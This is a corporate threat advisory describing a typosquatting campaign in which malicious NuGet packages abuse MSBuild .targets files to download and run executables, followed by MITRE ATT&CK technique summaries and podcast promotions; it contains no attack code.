Threat Advisory

Analysis of Malicious NuGet Packages

By

By

Access Point Consulting

Executive Summary 

There is a prolonged and organized cyber campaign aimed at compromising the NuGet package manager. This campaign, which began in August 2023, is characterized by the deployment of a large number of malicious NuGet packages. The threat actors involved have displayed a high level of sophistication, adapting their tactics over time. Initially, they relied on basic downloaders in install scripts, but they have since transitioned to exploiting NuGet’s MSBuild integrations. This shift in strategy indicates a significant level of technical proficiency and persistence on the part of the attackers.

Attack Vector

The attack vector employed by the threat actors centers around a technique known as “typosquatting.” This method involves creating packages with names that closely resemble popular and trusted ones. This can easily deceive developers who might not notice the subtle differences. Furthermore, the attackers have opted for an unconventional approach by placing their malicious code inside the <packageID>.targets file, located in the “build” directory. Typically, such code is found in initialization and post-installation PowerShell scripts. This deviation from the norm adds an extra layer of obscurity, making it harder for traditional security measures to detect the threat.

Attack Details

Within this campaign, the attackers have implemented a specific sequence of operations. The malicious code embedded within the .targets file is responsible for the download and execution of an executable from a remote location. This action is facilitated by the presence of MSBuild integrations, a feature introduced in NuGet version 2.5. These integrations permit the execution of executable code contained in inline tasks. By leveraging this capability, the attackers can run their malicious code in a manner that doesn’t immediately trigger conventional security alarms.

Tactics, Techniques, and Procedures (TTPs)

T1189 - Drive-by compromise

Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring Application Access Token.

T1035 - Service Execution

Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with New Service and Modify Existing Service during service persistence or privilege escalation.

T1105 – Ingress Tool Transfer

Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp. Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer).

T1027 - Obfuscated Files or Information

Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.

T1564.001 - Hide Artifacts: Hidden Files and Directories

Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and ls –a for Linux and macOS).

Associated Bulletins

Malicious NuGet packages abuse MSBuild to install malware (bleepingcomputer.com)

IAmReboot: Malicious NuGet packages exploit loophole in MSBuild integrations (reversinglabs.com)

Resources

CyberWatch

April 2, 2025

Scott "Monty" Montgomery (Island) | Navigating CMMC compliance for organizations of every size

Scott Montgomery, known as Monty, joined the CyberWatch Expert Series podcast to discuss his extensive background in cybersecurity, particularly in building and designing network security tools for high-assurance environments like the Department of Defense (DoD) and the intelligence community. His experience includes significant tenure at McAfee (now Trellix), which led him to his current role at Island, where he focuses on innovative approaches to cybersecurity compliance.

Find out more
March 19, 2025

Michael Sviben (DomainGuard) | Defending against phishing and building proactive security awareness

Cybersecurity threats evolve rapidly, and one tactic consistently rises above the rest: phishing. In this episode of CyberWatch, Michael Sviben, co-founder of DomainGuard, discusses why phishing remains so effective, how businesses and individuals become targets, and what you can do to stay vigilant.

Find out more
March 5, 2025

David Habib (Brightspot) | Building a culture of cybersecurity awareness

Cybersecurity awareness is often reduced to check-the-box training, but David Habib, CIO at Brightspot, argues that real security awareness isn’t about formal programs—it’s about making security part of a company’s culture. In this episode, he shares practical insights on how organizations can move beyond stale training sessions to create an engaged and security-conscious workforce.

Find out more